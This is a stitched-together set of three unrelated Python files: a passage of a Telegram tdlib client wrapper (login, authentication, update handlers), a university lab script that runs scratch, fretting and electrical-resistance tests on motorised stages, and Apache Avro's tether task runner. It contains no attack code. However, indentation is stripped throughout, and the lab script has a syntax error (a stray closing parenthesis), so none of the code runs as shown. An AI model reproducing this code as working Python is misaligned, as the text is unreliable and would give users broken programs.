supergroup_id
"""
return self._send_data({'@type': 'getSupergroupFullInfo', 'supergroup_id': supergroup_id})
def create_basic_group_chat(self, basic_group_id: int) -> AsyncResult:
"""
Create a chat from a basic group
Args:
basic_group_id
"""
return self._send_data({'@type': 'createBasicGroupChat', 'basic_group_id': basic_group_id})
def get_web_page_instant_view(self, url: str, force_full: bool = False) -> AsyncResult:
"""
Use this method to request instant preview of a webpage.
Returns error with 404 if there is no preview for this webpage.
Args:
url: URL of a webpage
force_full: If true, the full instant view for the web page will be returned
"""
data = {'@type': 'getWebPageInstantView', 'url': url, 'force_full': force_full}
return self._send_data(data)
def call_method(
self,
method_name: str,
params: Optional[Dict[str, Any]] = None,
block: bool = False,
) -> AsyncResult:
"""
Use this method to call any other method of the tdlib
Args:
method_name: Name of the method
params: parameters
"""
data = {'@type': method_name}
if params:
data.update(params)
return self._send_data(data, block=block)
def _run(self) -> None:
self._td_listener = threading.Thread(target=self._listen_to_td)
self._td_listener.daemon = True
self._td_listener.start()
self.worker.run()
def _listen_to_td(self) -> None:
logger.info('[Telegram.td_listener] started')
while not self._stopped.is_set():
update = self._tdjson.receive()
if update:
self._update_async_result(update)
self._run_handlers(update)
def _update_async_result(self, update: Dict[Any, Any]) -> typing.Optional[AsyncResult]:
async_result = None
_special_types = ('updateAuthorizationState',) # for authorizationProcess @extra.request_id doesn't work
if update.get('@type') in _special_types:
request_id = update['@type']
else:
request_id = update.get('@extra', {}).get('request_id')
if not request_id:
logger.debug('request_id has not been found in the update')
else:
async_result = self._results.get(request_id)
if not async_result:
logger.debug('async_result has not been found in by request_id=%s', request_id)
else:
done = async_result.parse_update(update)
if done:
self._results.pop(request_id, None)
return async_result
def _run_handlers(self, update: Dict[Any, Any]) -> None:
update_type: str = update.get('@type', 'unknown')
for handler in self._update_handlers[update_type]:
self._workers_queue.put((handler, update), timeout=self._queue_put_timeout)
def remove_update_handler(self, handler_type: str, func: Callable) -> None:
"""
Remove a handler with the specified type
"""
try:
self._update_handlers[handler_type].remove(func)
except (ValueError, KeyError):
# not in the list
pass
def add_message_handler(self, func: Callable) -> None:
self.add_update_handler(MESSAGE_HANDLER_TYPE, func)
def add_update_handler(self, handler_type: str, func: Callable) -> None:
if func not in self._update_handlers[handler_type]:
self._update_handlers[handler_type].append(func)
def _send_data(
self,
data: Dict[Any, Any],
result_id: Optional[str] = None,
block: bool = False,
) -> AsyncResult:
"""
Sends data to tdlib.
If `block`is True, waits for the result
"""
if '@extra' not in data:
data['@extra'] = {}
if not result_id and 'request_id' in data['@extra']:
result_id = data['@extra']['request_id']
async_result = AsyncResult(client=self, result_id=result_id)
data['@extra']['request_id'] = async_result.id
self._results[async_result.id] = async_result
self._tdjson.send(data)
async_result.request = data
if block:
async_result.wait(raise_exc=True)
return async_result
def idle(
self,
stop_signals: Tuple = (
signal.SIGINT,
signal.SIGTERM,
signal.SIGABRT,
signal.SIGQUIT,
),
) -> None:
"""
Blocks until one of the exit signals is received.
When a signal is received, calls `stop`.
"""
for sig in stop_signals:
signal.signal(sig, self._stop_signal_handler)
self._stopped.wait()
def _stop_signal_handler(self, signum: int, frame: FrameType) -> None:
logger.info('Signal %s received!', signum)
self.stop()
def get_authorization_state(self) -> AsyncResult:
logger.debug('Getting authorization state')
data = {'@type': 'getAuthorizationState'}
return self._send_data(data, result_id='getAuthorizationState')
def _wait_authorization_result(self, result: AsyncResult) -> AuthorizationState:
authorization_state = None
if result:
result.wait(raise_exc=True)
if result.update is None:
raise RuntimeError('Something wrong, the result update is None')
if result.id == 'getAuthorizationState':
authorization_state = result.update['@type']
else:
authorization_state = result.update['authorization_state']['@type']
return AuthorizationState(authorization_state)
def login(self, blocking: bool = True) -> AuthorizationState:
"""
Login process.
Must be called before any other call.
It sends initial params to the tdlib, sets database encryption key, etc.
args:
blocking [bool]: If True, the process is blocking and the client
expects password and code from stdin.
If False, `login` call returns next AuthorizationState and
the login process can be continued (with calling login(blocking=False) again)
after the necessary action is completed.
Returns:
- AuthorizationState.WAIT_CODE if a telegram code is required.
The caller should ask the telegram code
to the end user then call send_code(code)
- AuthorizationState.WAIT_PASSWORD if a telegram password is required.
The caller should ask the telegram password
to the end user and then call send_password(password)
- AuthorizationState.READY if the login process scceeded.
"""
if self.proxy_server:
self._send_add_proxy()
actions: Dict[AuthorizationState, Callable[[], AsyncResult]] = {
AuthorizationState.NONE: self.get_authorization_state,
AuthorizationState.WAIT_TDLIB_PARAMETERS: self._set_initial_params,
AuthorizationState.WAIT_ENCRYPTION_KEY: self._send_encryption_key,
AuthorizationState.WAIT_PHONE_NUMBER: self._send_phone_number_or_bot_token,
AuthorizationState.WAIT_CODE: self._send_telegram_code,
AuthorizationState.WAIT_PASSWORD: self._send_password,
}
blocking_actions = (
AuthorizationState.WAIT_CODE,
AuthorizationState.WAIT_PASSWORD,
)
if self.phone:
logger.info('[login] Login process has been started with phone')
else:
logger.info('[login] Login process has been started with bot token')
while self.authorization_state != AuthorizationState.READY:
logger.info('[login] current authorization state: %s', self.authorization_state)
if not blocking and self.authorization_state in blocking_actions:
return self.authorization_state
result = actions[self.authorization_state]()
if not isinstance(result, AuthorizationState):
self.authorization_state = self._wait_authorization_result(result)
else:
self.authorization_state = result
return self.authorization_state
def _set_initial_params(self) -> AsyncResult:
logger.info(
'Setting tdlib initial params: files_dir=%s, test_dc=%s',
self.files_directory,
self.use_test_dc,
)
data = {
# todo: params
'@type': 'setTdlibParameters',
'parameters': {
'use_test_dc': self.use_test_dc,
'api_id': self.api_id,
'api_hash': self.api_hash,
'device_model': self.device_model,
'system_version': self.system_version,
'application_version': self.application_version,
'system_language_code': self.system_language_code,
'database_directory': os.path.join(self.files_directory, 'database'),
'use_message_database': self.use_message_database,
'files_directory': os.path.join(self.files_directory, 'files'),
'use_secret_chats': self.use_secret_chats,
},
}
return self._send_data(data, result_id='updateAuthorizationState')
def _send_encryption_key(self) -> AsyncResult:
logger.info('Sending encryption key')
key = self._database_encryption_key
if isinstance(key, str):
key = key.encode()
data = {
'@type': 'checkDatabaseEncryptionKey',
'encryption_key': base64.b64encode(key).decode(),
}
return self._send_data(data, result_id='updateAuthorizationState')
def _send_phone_number_or_bot_token(self) -> AsyncResult:
"""Sends phone number or a bot_token"""
if self.phone:
return self._send_phone_number()
elif self.bot_token:
return self._send_bot_token()
else:
raise RuntimeError('Unknown mode: both bot_token and phone are None')
def _send_phone_number(self) -> AsyncResult:
logger.info('Sending phone number')
data = {
'@type': 'setAuthenticationPhoneNumber',
'phone_number': self.phone,
'allow_flash_call': False,
'is_current_phone_number': True,
}
return self._send_data(data, result_id='updateAuthorizationState')
def _send_add_proxy(self) -> AsyncResult:
logger.info('Sending addProxy')
data = {
'@type': 'addProxy',
'server': self.proxy_server,
'port': self.proxy_port,
'enable': True,
'type': self.proxy_type,
}
return self._send_data(data, result_id='setProxy')
def _send_bot_token(self) -> AsyncResult:
logger.info('Sending bot token')
data = {'@type': 'checkAuthenticationBotToken', 'token': self.bot_token}
return self._send_data(data, result_id='updateAuthorizationState')
def _send_telegram_code(self, code: Optional[str] = None) -> AsyncResult:
logger.info('Sending code')
if code is None:
code = input('Enter code:')
data = {'@type': 'checkAuthenticationCode', 'code': str(code)}
return self._send_data(data, result_id='updateAuthorizationState')
def send_code(self, code: str) -> AuthorizationState:
"""
Verifies a telegram code and continues the authorization process
Args:
code: the code to be verified. If code is None, it will be asked to the user using the input() function
Returns
- AuthorizationState. The called have to call `login` to continue the login process.
Raises:
- RuntimeError if the login failed
"""
result = self._send_telegram_code(code)
self.authorization_state = self._wait_authorization_result(result)
return self.authorization_state
def _send_password(self, password: Optional[str] = None) -> AsyncResult:
logger.info('Sending password')
if password is None:
password = getpass.getpass('Password:')
data = {'@type': 'checkAuthenticationPassword', 'password': password}
return self._send_data(data, result_id='updateAuthorizationState')
def send_password(self, password: str) -> AuthorizationState:
"""
Verifies a telegram password and continues the authorization process
Args:
password the password to be verified.
If password is None, it will be asked to the user using the getpass.getpass() function
Returns
- AuthorizationState. The called have to call `login` to continue the login process.
Raises:
- RuntimeError if the login failed
"""
result = self._send_password(password)
self.authorization_state = self._wait_authorization_result(result)
return self.authorization_state
|
scratch_fretting.py
|
"""
Date 01.2021
@author: Chair of Functional Materials - Saarland University - Saarbrücken, Bruno Alderete
@version 1.0
"""
__author__ = 'Bruno Alderete'
#######################################################################################################################
#
# The MIT License (MIT)
#
# Copyright (c) 2021 Bruno Alderete
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
#######################################################################################################################
#########################################################################
########################################################
########################################################
############# SCRATCH AND FRETTING TEST ###############
########################################################
########################################################
#########################################################################
from gsv8 import gsv8 # import for force sensor
from GSV_BasicMeasurement import BasicMeasurement # import for force Sensor
from pipython import GCSDevice, pitools # import for stages
import time # import for time
from datetime import datetime, timedelta
import threading
import pandas as pd
import pyvisa
########################
##### INSTRUMENTS #####
########################
### STAGES ###
STAGES = ('L-511.20SD00', 'L-511.20SD00')
REFMODE = ('FNL') # Fast reference move to negative limit
motorZ = GCSDevice('C-663.12')
motorX = GCSDevice('C-663.12')
### FORCE SENSOR ###
force_sensor = gsv8("COM16", 115200)
### PIEZO ###
piezo = GCSDevice(devname='E-709.CHG')
### ELECTRICAL EQUIPMENT ###
rm = pyvisa.ResourceManager('@py')
k2400 = rm.open_resource('GPIB::24::INSTR')
k2182 = rm.open_resource('GPIB::7::INSTR')
###############################
##### VARIABLES AND LISTS #####
###############################
is_done = False
### ELECTRIC PARAMETERS ###
i_meas_list = []
v_meas_list = []
resistance = []
current = 100E-3 # 100 mA
sleep_time = 1
### FORCE ACQUISITION ###
force_x = []
force_z = []
cof = []
### FRETTING ###
amp = []
freq = []
dur = []
dur_time = []
### RESULTS ###
df_results = pd.DataFrame(columns=['Force X-Axis', 'Force Z-Axis', 'CoF'])
df_fretting = pd.DataFrame(columns=['Amplitude', 'Frequency', 'Cycles', 'Fretting duration'])
df_electric = pd.DataFrame(columns=['Current', 'Voltage', 'Resistance'])
df_all_values = pd.DataFrame(columns=['Force X-Axis', 'Force Z-Axis', 'CoF', 'Amplitude', 'Frequency', 'Cycles', 'Fretting duration', 'Current', 'Voltage', 'Resistance'])
###############################
##### FUNCTION DEFINITION #####
###############################
### TAKE FORCE ALL AXIS ###
def take_force_all():
measurement0 = force_sensor.ReadValue()
x_load0 = "%.4f" % float('{}'.format(measurement0.getChannel1()))
y_load0 = "%.4f" % float('{}'.format(measurement0.getChannel2()))
z_load0 = "%.4f" % float('{}'.format(measurement0.getChannel3()))
print('X load is: ', x_load0, ' N')
print('Y load is: ', y_load0, ' N')
print('Z load is: ', z_load0, ' N')
### TAKE NORMAL LOAD ONLY ###
def take_force_normal():
measurementZ = force_sensor.ReadValue()
z_load = "%.4f" % float('{}'.format(measurementZ.getChannel3()))
print('Z load is ', z_load, ' N')
return z_load
### START, REFERENCE AND MOVE STAGES TO CENTER POSITION ###
def start_stages(targetZ=10,targetX=26,vel_Z=15,vel_X=15,wait=5):
motorZ.OpenUSBDaisyChain(description='019550102')
daisychainid = motorZ.dcid
motorZ.ConnectDaisyChainDevice(1, daisychainid)
motorX.ConnectDaisyChainDevice(2, daisychainid)
pitools.startup(motorZ, stages=STAGES, refmode=REFMODE)
print('Z-axis current position: ', float(str(motorZ.qPOS(motorZ.axes))[18:-3]))
pitools.startup(motorX, stages=STAGES, refmode=REFMODE)
print('X-axis current position: ', float(str(motorX.qPOS(motorX.axes))[18:-3]))
time.sleep(wait)
motorX.VEL(motorX.axes, vel_X)
motorX.MOV(motorX.axes, targetX)
pitools.waitontarget(motorX)
print('Position X: ',float(str(motorX.qPOS(motorX.axes))[18:-3]))
motorZ.VEL(motorZ.axes, vel_Z)
motorZ.MOV(motorZ.axes, targetZ)
pitools.waitontarget(motorZ)
print('Position Z: ',float(str(motorZ.qPOS(motorZ.axes))[18:-3]))
time.sleep(wait)
### START ELECTRIC INSTRUMENTS ###
def start_instr(curr_app='100E-3',curr_prot='150E-3'):
# Start and reset Keithley 2400
k2400.write('*RST')
k2400.timeout = 60000 # 60 seconds timeout
k2400.write(':ROUT:TERM REAR')
k2400.write(':SENS:FUNC:CONC OFF')
k2400.write(':SOUR:FUNC CURR')
k2400.write(f':SOUR:CURR {curr_app}') # Applied current in A
k2400.write(":SENS:FUNC 'CURR:DC'")
k2400.write(f':SENS:CURR:PROT {curr_prot}')
# Start and resete Keithley 2182
k2182.write('*RST')
### TAKE i MEASUREMENT ###
def take_i_meas(sour_del=1):
k2400.write('TRIG:COUN 1') # Amount of measurements
k2400.write(f'SOUR:DEL {sour_del}') # Delay in seconds (between 0, 60). Time i is applied
k2400.write(':FORM:ELEM CURR')
k2400.write(':OUTP ON')
i_meas_list.append(k2400.query_ascii_values(':READ?'))
### TAKE V MEASUREMENT ###
def take_v_meas():
k2182.write('*RST')
k2182.write(":SENS:FUNC 'VOLT'")
k2182.write(':SENS:CHAN 1')
k2182.write(':SENS:VOLT:CHAN1:RANG 1') # k2182.write(':SENS:VOLT:CHAN1:RANG:AUTO ON')
v_meas_list.append(k2182.query_ascii_values(':READ?'))
### TAKE FULL MEASUREMENT ###
def take_measurement(meas=5, trigs=0, curr_app='100E-3', curr_prot='150E-3', sour_del=1, sleep_time=1):
start_instr(curr_app, curr_prot)
while trigs < meas:
take_i_meas(sour_del)
take_v_meas()
trigs += 1
k2400.write(':OUTP OFF') # turns off smu between measurements
### ECR ###
def ecr(meas=5):
trigs = 0 # set counter to zero
while trigs < meas:
if trigs % 2 == 0:
take_measurement(meas=1, trigs=0, curr_app=str(current), curr_prot='150E-3', sour_del=1)
time.sleep(sleep_time)
else:
take_measurement(meas=1, trigs=0, curr_app='-' + str(current), curr_prot='150E-3', sour_del=1)
time.sleep(sleep_time)
trigs += 1
### COARSE APPROACH X-AXIS ###
def approach_X_stage(approach_X=1):
print('Position X: ',float(str(motorX.qPOS(motorX.axes))[18:-3]))
while approach_X == 1:
print('\n##############################################################')
moveX = float(input('Enter how many mm the X-axis should move: '))
print('You chose to move: ', moveX, ' mm\n')
motorX.MVR(motorX.axes, moveX) # MVR moves relative, MOV moves absolute
pitools.waitontarget(motorX)
print('Position X: ',float(str(motorX.qPOS(motorX.axes))[18:-3]))
approach_X = int(input('Do you want to keep moving the X stage? (enter 1 to continue approaching, enter 0 if you DO NOT want to continue approaching: '))
if approach_X == 1:
print('You chose to continue approaching the X stage.\n') # MAKE SURE YOU INPUT CORRECTLY
else:
print('You are done approaching the X stage.\n')
### COARSE APPROACH Z-AXIS ###
def approach_Z_stage(approach_Z=1):
print('Position Z: ',float(str(motorZ.qPOS(motorZ.axes))[18:-3]))
while approach_Z == 1:
print('\n##############################################################')
moveZ = float(input('Enter how many mm the Z-axis should move: '))
print('You chose to move: ', moveZ, ' mm\n')
motorZ.MVR(motorZ.axes, moveZ)
pitools.waitontarget(motorZ)
print('Position Z: ',float(str(motorZ.qPOS(motorZ.axes))[18:-3]))
approach_Z = int(input('Do you want to keep moving the Z stage? (enter 1 to continue approaching, enter 0 if you DO NOT want to continue approaching: '))
if approach_Z == 1 :
print('You chose to continue approaching the Z stage.\n') # MAKE SURE YOU INPUT CORRECTLY
else:
print('You are done approaching the Z stage.\n')
start_stages()
approach_X_stage()
approach_Z_stage()
approach_X_stage()
#############################
###### PARAMETER INPUT ######
#############################
### SCRATCH ###
print('\n##############################################################')
print('In the following commands please input the parameters for the scratch test.')
track_length = float(input('Enter the length of the desired scratch (in mm): '))
print('You chose {} mm track length\n'.format(track_length))
print('Current X stage velocity: {} mm/s'.format(float(str(motorX.qVEL(motorX.axes))[18:-3])))
scratch_vel = float(input('Enter the motion velocity: '))
motorX.VEL(motorX.axes, scratch_vel)
print('You chose the {} mm/s.\n'.format(float(str(motorX.qVEL(motorX.axes))[18:-3])))
### FRETTING ###
print('\n##############################################################')
print('Now enter the parameters for the fretting test.')
amplitude = float(input('Enter the amplitude (max amplitude is 75 µm): '))
print('You chose {} µm amplitude.\n'.format(amplitude))
frequency_input = float(input('Enter the frequency (max frequency is 100 Hz): '))
fretting_vel = (frequency_input * amplitude)
print('You chose {} Hz frequency.\n'.format(frequency_input))
cycles = float(input('Enter the desired duration of the fretting test (in cycles): '))
print('{} cycles will be done.'.format(cycles))
total_time = (cycles / frequency_input) # approximate time it takes for the fretting test
### START ###
start = int(input('Do you want to start? Enter 1 to start, enter 0 to exit. '))
time.sleep(1)
#########################################
##### FINE APPROACH TO FORCE SENSOR #####
#########################################
def fine_approach(target_load=5):
z_load_i = take_force_normal()
print('Initial normal load measurement: ', z_load_i, ' N')
if start == 1:
print ('\nStarting fine approach')
print('Current force: ', float(z_load_i), ' N') # first measurement from force sensor (NULLER)
current_z_load = take_force_normal() # current sensor value
print('Current load: ',current_z_load, ' N')
while (float(current_z_load) < float(target_load)):
position = float(str(motorZ.qPOS(motorZ.axes))[18:-3]) # get position
print('Current motor position: ', position)
print('\nApproaching...') # starts moving
if float(current_z_load) < (target_load * 0.4):
ztarget = position + 0.01
elif float(current_z_load) >= (target_load * 0.4) and float(current_z_load) <= (target_load * 0.90):
ztarget = position + 0.001
else:
ztarget = position + 0.0001
print('Target: ', ztarget)
motorZ.MOV(motorZ.axes, ztarget)
pitools.waitontarget(motorZ)
position = float(str(motorZ.qPOS(motorZ.axes))[18:-3])
print('New motor position: ', position)
time.sleep(0.5) # wait for 0.5 s before taking new force measurement
current_z_load = take_force_normal()
print('current load: ',current_z_load, ' N')
print('Target force reached: {}'.format(current_z_load))
time.sleep(1)
### SCRATCH TEST ###
def scratch_test(track_length, scratch_vel):
print('\nStarting scratch test...')
time.sleep(0.5)
motorX.VEL(motorX.axes, scratch_vel)
motorX.MVR(motorX.axes, track_length)
time.sleep(2)
### RETURN AFTER SCRATCH ###
def scratch_return(track_length, scratch_vel):
motorX.VEL(motorX.axes, scratch_vel)
motorX.MVR(motorX.axes, -track_length)
### FRETTING TEST ###
def fretting_test(amplitude, fretting_vel, cycles):
print('\nStarting fretting test...')
global cycle_counter
cycle_counter = 0
#piezo.InterfaceSetupDlg()
piezo.ConnectUSB('0119028920')
start_fretting = datetime.now()
piezo.SVO(1, 1) # Set servo mode
piezo.MOV(1, 0) # Move to absolute position 0
print(piezo.qPOS(1)) # Query starting position
piezo.VEL(1, fretting_vel) # Set velocity to the value
print(piezo.qVEL(1)) # Query velocity
while cycle_counter < cycles:
piezo.MVR(1, amplitude)
position1 = piezo.qPOS(1)
print(position1)
piezo.MOV(1, 0)
position2 = piezo.qPOS(1)
print(position2)
cycle_counter += 1
end_fretting = datetime.now()
global fretting_runtime
fretting_runtime = (end_fretting - start_fretting).total_seconds()
print('Fretting test ran for {} seconds.'.format(fretting_runtime))
time.sleep(1)
piezo.CloseConnection()
return fretting_runtime
### ACQUIRE FORCE DATA ###
def acquire_cof():
timestamp = time.time()
start_time = timestamp
Mesfrq = 0.01
next_measurement = timestamp
duration1 = (track_length / scratch_vel) + 4
while (start_time + duration1) > time.time():
if (time.time() >= next_measurement):
next_measurement += Mesfrq
force_meas = force_sensor.ReadValue()
value_z = float('{}'.format(force_meas.getChannel3())) # normal load
value_x = float('{}'.format(force_meas.getChannel1())) # friction
force_x.append(value_x)
force_z.append(value_z)
print('\nZ value: ',value_z)
print('X value: ',value_x)
timestamp = time.time()
### CONTROL NORMAL LOAD ###
def control_normal_load(target_load):
while is_done == False:
#current_time =time.time()
normal_load = take_force_normal()
if float(normal_load) < target_load:
position = float(str(motorZ.qPOS(motorZ.axes))[18:-3])
ztarget = position + 0.0001
motorZ.MOV(motorZ.axes, ztarget)
normal_load = take_force_normal()
elif float(normal_load) > target_load:
position = float(str(motorZ.qPOS(motorZ.axes))[18:-3])
ztarget = position - 0.0001)
motorZ.MOV(motorZ.axes, ztarget)
normal_load = take_force_normal()
else:
return
def start_threading(target_load):
global is_done
is_done = False
### Start force control and first ECR ###
t9 = threading.Thread(target=control_normal_load, args=((5),))
t9.start()
t5 = threading.Thread(target=ecr, args=((5),))
t5.start()
t5.join()
time.sleep(0.2)
if t5.is_alive() == False:
is_done = True
### Scratch test with CoF ### No compensation
t2 = threading.Thread(target=acquire_cof)
t3 = threading.Thread(target=scratch_test, args=((track_length), (scratch_vel), ))
t2.start()
t3.start()
t3.join()
t2.join()
### Second ECR with compensation pause ###
is_done = False
t10 = threading.Thread(target=control_normal_load, args=((5),))
t10.start()
time.sleep(5)
normal_load = float(take_force_normal())
while normal_load < float((target_load * 0.99)) or normal_load > float((target_load *1.01)):
time.sleep(0.5)
normal_load = float(take_force_normal())
t6 = threading.Thread(target=ecr, args=((5),))
t6.start()
t6.join()
time.sleep(0.2)
### Fretting test (compensation cont.) ###
t1 = threading.Thread(target=control_normal_load, args=((5),))
t1.start()
time.sleep(1)
t4 = threading.Thread(target=fretting_test, args=((amplitude), (fretting_vel), (cycles)))
t4.start()
t4.join()
time.sleep(0.2)
### Third ECR (compensation cont.) ###
t11 = threading.Thread(target=control_normal_load, args=((5),))
t11.start()
time.sleep(5)
t7 = threading.Thread(target=ecr, args=((5),))
t7.start()
t7.join()
time.sleep(0.2)
if t7.is_alive() == False:
is_done = True
### Scratch return to starting position with CoF ### No compensation
t8 = threading.Thread(target=acquire_cof)
t12 = threading.Thread(target=scratch_return, args=((track_length), (scratch_vel)))
t8.start()
t12.start()
t12.join()
t8.join()
print('Tests finished...')
### DATA TO CSV ###
def save_data():
# Electric parameters #
for x in range(len(i_meas_list[:])):
df_electric.loc[x, 'Current'] = (i_meas_list[x-1][0])
df_electric.loc[x, 'Voltage'] = (v_meas_list[x-1][0])
resist = v_meas_list[x-1][0] / i_meas_list[x-1][0]
resistance.append(resist)
df_electric['Resistance'] = resistance
# Force parameters #
for x in range(len(force_x[:])):
df_results.loc[x, 'Force X-Axis'] = (force_x[x-1])
df_results.loc[x, 'Force Z-Axis'] = (force_z[x-1])
coef_of_f = force_x[x-1] / force_z[x-1]
cof.append(coef_of_f)
df_results['CoF'] = cof
amp.append(amplitude)
df_fretting['Amplitude'] = amp
freq.append(frequency_input)
df_fretting['Frequency'] = freq
dur.append(cycle_counter)
df_fretting['Cycles'] = dur
dur_time.append(fretting_runtime)
df_fretting['Fretting duration'] = fretting_runtime
print(df_results)
print(df_fretting)
print(df_electric)
df_all_values = pd.concat([df_results,df_fretting,df_electric], ignore_index=True, axis=1)
print(df_all_values)
df_results.to_csv(r'C:\Users\Labor\Desktop\fretting_scratch_erc24.02_2.1.csv', index=False)
df_fretting.to_csv(r'C:\Users\Labor\Desktop\fretting_scratch_erc24.02_2.2.csv', index=False)
df_all_values.to_csv(r'C:\Users\Labor\Desktop\fretting_scratch_erc24.02_2.3.csv', index=False)
### Z Stage retreats ###
def retreat_stages(targetZ=10,targetX=26,vel_Z=15,vel_X=15,wait=2):
time.sleep(2)
retreat = int(input('Return stages to starting position? Enter 1 for yes, enter 0 for no: '))
if retreat == 1:
targetZ0 = -5
motorZ.MVR(motorZ.axes, targetZ0)
pitools.waitontarget(motorZ)
time.sleep(1)
motorX.VEL(motorX.axes, vel_X)
motorX.MOV(motorX.axes, targetX)
pitools.waitontarget(motorX)
print('Position X: ',float(str(motorX.qPOS(motorX.axes))[18:-3]))
motorZ.VEL(motorZ.axes, vel_Z)
motorZ.MOV(motorZ.axes, targetZ)
pitools.waitontarget(motorZ)
print('Position Z: ',float(str(motorZ.qPOS(motorZ.axes))[18:-3]))
time.sleep(wait)
fine_approach(target_load=5)
start_threading(target_load=5)
save_data()
### END PROGRAM ###
retreat_stages(targetZ=10,targetX=26,vel_Z=15,vel_X=15,wait=5)
print('Closing program...')
elapse_time = (time.perf_counter() / 60)
print('Elapse time: {} min'.format(elapse_time))
#########################################
##### CLOSES CONNECTION WITH MOTORS #####
#########################################
motorZ.CloseDaisyChain()
|
tether_task_runner.py
|
#!/usr/bin/env python
##
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function
import logging
import sys
import threading
import traceback
import weakref
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import avro.tether.tether_task
import avro.tether.util
from avro import ipc
__all__ = ["TaskRunner"]
class TaskRunnerResponder(ipc.Responder):
"""
The responder for the tethered process
"""
def __init__(self,runner):
"""
Param
----------------------------------------------------------
runner - Instance of TaskRunner
"""
ipc.Responder.__init__(self, avro.tether.tether_task.inputProtocol)
self.log=logging.getLogger("TaskRunnerResponder")
# should we use weak references to avoid circular references?
# We use weak references b\c self.runner owns this instance of TaskRunnerResponder
if isinstance(runner,weakref.ProxyType):
self.runner=runner
else:
self.runner=weakref.proxy(runner)
self.task=weakref.proxy(runner.task)
def invoke(self, message, request):
try:
if message.name=='configure':
self.log.info("TetherTaskRunner: Recieved configure")
self.task.configure(request["taskType"],request["inSchema"],request["outSchema"])
elif message.name=='partitions':
self.log.info("TetherTaskRunner: Recieved partitions")
try:
self.task.set_partitions(request["partitions"])
except Exception as e:
self.log.error("Exception occured while processing the partitions message: Message:\n"+traceback.format_exc())
raise
elif message.name=='input':
self.log.info("TetherTaskRunner: Recieved input")
self.task.input(request["data"],request["count"])
elif message.name=='abort':
self.log.info("TetherTaskRunner: Recieved abort")
self.runner.close()
elif message.name=='complete':
self.log.info("TetherTaskRunner: Recieved complete")
self.task.complete()
self.task.close()
self.runner.close()
else:
self.log.warning("TetherTaskRunner: recieved unknown message {0}".format(message.name))
except Exception as e:
self.log.error("Error occured while processing message: {0}".format(message.name))
emsg=traceback.format_exc()
self.task.fail(emsg)
return None
def HTTPHandlerGen(runner):
"""
This is a class factory for the HTTPHandler. We need
a factory because we need a reference to the runner
Parameters
-----------------------------------------------------------------
runner - instance of the task runner
"""
if not(isinstance(runner,weakref.ProxyType)):
runnerref=weakref.proxy(runner)
else:
runnerref=runner
class TaskRunnerHTTPHandler(BaseHTTPRequestHandler):
"""Create a handler for the parent.
"""
runner=runnerref
def __init__(self,*args,**param):
"""
"""
BaseHTTPRequestHandler.__init__(self,*args,**param)
def do_POST(self):
self.responder =TaskRunnerResponder(self.runner)
call_request_reader = ipc.FramedReader(self.rfile)
call_request = call_request_reader.read_framed_message()
resp_body = self.responder.respond(call_request)
self.send_response(200)
self.send_header('Content-Type', 'avro/binary')
self.end_headers()
resp_writer = ipc.FramedWriter(self.wfile)
resp_writer.write_framed_message(resp_body)
return TaskRunnerHTTPHandler
class TaskRunner(object):
"""This class ties together the server handling the requests from
the parent process and the instance of TetherTask which actually
implements the logic for the mapper and reducer phases
"""
def __init__(self,task):
"""
Construct the runner
Parameters
---------------------------------------------------------------
task - An instance of tether task
"""
self.log=logging.getLogger("TaskRunner:")
if not(isinstance(task, avro.tether.tether_task.TetherTask)):
raise ValueError("task must be an instance of tether task")
self.task=task
self.server=None
self.sthread=None
def start(self,outputport=None,join=True):
"""
Start the server
Parameters
-------------------------------------------------------------------
outputport - (optional) The port on which the parent process is listening
for requests from the task.
- This will typically be supplied by an environment variable
we allow it to be supplied as an argument mainly for debugging
join - (optional) If set to fault then we don't issue a join to block
until the thread excecuting the server terminates.
This is mainly for debugging. By setting it to false,
we can resume execution in this thread so that we can do additional
testing
"""
port = avro.tether.util.find_port()
address=("localhost",port)
def thread_run(task_runner=None):
task_runner.server = HTTPServer(address, HTTPHandlerGen(task_runner))
task_runner.server.allow_reuse_address = True
task_runner.server.serve_forever()
# create a separate thread for the http server
sthread=threading.Thread(target=thread_run,kwargs={"task_runner":self})
sthread.start()
self.sthread=sthread
# This needs to run in a separat thread b\c serve_forever() blocks
self.task.open(port,clientPort=outputport)
# wait for the other thread to finish
if (join):
self.task.ready_for_shutdown.wait()
self.server.shutdown()
# should we do some kind of check to make sure it exits
self.log.info("Shutdown the logger")
# shutdown the logging
logging.shutdown()
def close(self):
"""
Handler for the close message
"""
self.task.close()
if __name__ == '__main__':
# TODO::Make the logging level a parameter we can set
# logging.basicConfig(level=logging.INFO,filename='/tmp/log',filemode='w')
logging.basicConfig(level=logging.INFO)
if (len(sys.argv)<=1):
print("Error: tether_task_runner.__main__: Usage: tether_task_runner task_package.task_module.TaskClass")
raise ValueError("Usage: tether_task_runner task_package.task_module.TaskClass")
fullcls=sys.argv[1]
mod,cname=fullcls.rsplit(".",1)
logging.info("tether_task_runner.__main__: Task: {0}".format(fullcls))
modobj=__import__(mod,fromlist=cname)
taskcls=getattr(modobj,cname)
task=taskcls()
